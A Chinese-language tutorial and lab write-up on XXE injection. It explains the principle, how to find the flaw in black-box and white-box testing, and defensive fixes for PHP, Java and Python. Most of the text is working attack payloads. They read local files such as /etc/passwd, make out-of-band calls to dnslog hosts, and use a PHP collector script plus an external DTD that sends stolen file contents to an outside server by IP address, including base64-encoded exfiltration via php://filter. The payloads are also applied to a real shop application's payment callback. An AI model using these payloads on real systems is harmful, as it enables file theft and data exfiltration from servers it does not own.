XML&XXE实体注入
原理
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。等同于JSON传输。XXE漏洞XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网扫描、攻击内网等危害。
XML 与 HTML 的主要差异
XML 被设计为传输和存储数据,其焦点是数据的内容。
HTML 被设计用来显示数据,其焦点是数据的外观。
HTML 旨在显示信息 ,而XML旨在传输存储信息。
Example:网站的xml文件解析
XXE黑盒发现
- 1、获取得到Content-Type或数据类型为xml时,尝试xml语言payload进行测试
- 2、不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试xxe
- 3、XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行
XXE白盒发现
- 1、可通过应用功能追踪代码定位审计
- 2、可通过脚本特定函数搜索定位审计
- 3、可通过伪协议玩法绕过相关修复等
XXE修复防御方案:
方案1-禁用外部实体
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);
Python:
from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
方案2-过滤用户提交的XML数据
过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC
案例
抓取登录框数据包
data:image/s3,"s3://crabby-images/1140c/1140c34fa0036ad3c53a9fe36935d7dfacd474ed" alt=""
xml数据包可以看Content-Type,和数据包格式,
一般的数据包格式为:user=admin&pass=123
json格式的为:message{ "user":100,
"passwd":20 }
data:image/s3,"s3://crabby-images/d589d/d589d079d26c98ef06f29b0f6a248d3bcabc4a4c" alt=""
回显
直接构造
构造恶意xml数据包读取d盘下123.txt
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/123.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>
成功读取到d盘下123.txt
data:image/s3,"s3://crabby-images/ef69e/ef69e23202a574ce5d145c420764a956f4deabbd" alt=""
外部引用实体dtd
创建一个123.dtd文件到到服务器,因为靶场就在本机,我就直接在本地创建
读取d盘下123.txt
<!ENTITY send SYSTEM "file:///d:/123.txt">
data:image/s3,"s3://crabby-images/02af8/02af8d37719e61cca550f31960d1c4dc0b82d4c8" alt=""
然后使用python开启http服务
data:image/s3,"s3://crabby-images/0f493/0f493c56f417e9c70e18f0d0f099ddf92d54e5f8" alt=""
成功执行
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://192.168.100.2:5566/123.dtd">
%file;
]>
<user><username>&send;</username><password>Mikasa</password></user>
data:image/s3,"s3://crabby-images/434cc/434cc531774e766adcf952a5bcf7f4d7281283be" alt=""
无回显
带外测试
我搭建的服务器不知道怎么回事,一直返回500的错误,但是dnslog显示已经访问
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://gtegti.dnslog.cn">
%file;
]>
<user><username>&send;</username><password>xiaodi</password></user>
data:image/s3,"s3://crabby-images/608d9/608d9231280d908b9c5ecdf6c9cef8ed9b47022e" alt=""
dnslog访问成功
data:image/s3,"s3://crabby-images/392f0/392f0cb8bfb5c068ec0d9ba0d3a0909f974cb307" alt=""
无回显读文件
将get.php放入到服务器,
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>
将test.dtd放入服务器
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">
开启php服务
php -S 0.0.0.0:5566
data:image/s3,"s3://crabby-images/a3863/a38635a6b2c0f99c06992f4e30990aa2ba8c339f" alt=""
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/123.txt">
<!ENTITY % remote SYSTEM "http://x.x.x.x:5566/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
data:image/s3,"s3://crabby-images/539ca/539ca3ec81ade64d89d44ebf9f6b52d1f1bd32ef" alt=""
服务器生成读取出来的file.txt
data:image/s3,"s3://crabby-images/23195/23195cc8076a9b52ff6f3745c6bd722afa093645" alt=""
测试案例
data:image/s3,"s3://crabby-images/66a46/66a4645c41adf92d6072f897ac3dd35cd4b2df51" alt=""
抓包显示的是json的数据包
data:image/s3,"s3://crabby-images/fd09d/fd09d8619e66821f12887db5b8b0e027368b885d" alt=""
将json数据类型改成xml类型
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<user>&test;</user>
data:image/s3,"s3://crabby-images/ecc13/ecc135a34f5b12038a02892d230f0d5989e31873" alt=""
白盒审计
搜索simplexml函数
data:image/s3,"s3://crabby-images/e7502/e7502cf6893761815372108e91a7f9f27cf57a1a" alt=""
找到simplexml函数
data:image/s3,"s3://crabby-images/9f861/9f861e44d649d9e2b2aa3b3d9720e5886e70a805" alt=""
pe_getxml方法用到了simplexml,使用CTRL+B快捷键转到pe_getxml方法声明或用例
data:image/s3,"s3://crabby-images/c5e0f/c5e0f19cb34d49009f3d1aa82d7daedb2604984e" alt=""
转到pe_getxml用例可以看到,wechat_getxml调用了pe_getxml,相当于wechat_getxml调用了simplexml函数。
data:image/s3,"s3://crabby-images/effc0/effc006274c8e883259a693103398e77b61b2805" alt=""
使用CTRL+B快捷键转到wechat_getxml方法声明或用例,下面使用xml返回的数据都是固定的,应该是无回显
data:image/s3,"s3://crabby-images/60202/6020277cf5f6d5898ad44a37a0a4c446f95e53f6" alt=""
复制路径地址访问抓包
include/plugin/payment/wechat/notify_url.php
data:image/s3,"s3://crabby-images/65abc/65abc3b9b2806a5d9cd6b092f375fb2e128c708f" alt=""
使用带外测试
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://55vl9k.dnslog.cn">
%file;
]>
data:image/s3,"s3://crabby-images/be9b7/be9b74ea4f59f8172d1eea2c36fd98318a46a7c5" alt=""
data:image/s3,"s3://crabby-images/007a5/007a5649d1d5dcf616fd11d5aefc263ad732e5d3" alt=""
无回显读文件
原格式读取
将get.php放入到服务器,
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>
将test.dtd放入服务器
<!ENTITY % all "<!ENTITY send SYSTEM 'http://x.x.x.x:5566/get.php?file=%file;'>">
开启php服务
php -S 0.0.0.0:5566
data:image/s3,"s3://crabby-images/66919/66919a53ffe1a4a56ead3f30c6d53a36ccb9f76b" alt=""
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/123.txt">
<!ENTITY % remote SYSTEM "http://x.x.x.x:5566/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
查看生成的file.txt,成功读取到c盘下123.txt
data:image/s3,"s3://crabby-images/d41c7/d41c7c3f2e6d5551fd983a9efdb36ae9e4f23b5c" alt=""
base64读带空格文件
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/123.txt">
<!ENTITY % remote SYSTEM "http://x.x.x.x:5566/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
data:image/s3,"s3://crabby-images/01450/01450dd49e4124f54b6f7dfb7b30d364b56fdcdc" alt=""
成功读取并以base64编码格式
data:image/s3,"s3://crabby-images/7371a/7371abe6d1f396063c9d97a9a944eee47ee99484" alt=""
解码还原
data:image/s3,"s3://crabby-images/de779/de77938e5b3aa54e0fbfe332f4a28556ec7996d3" alt=""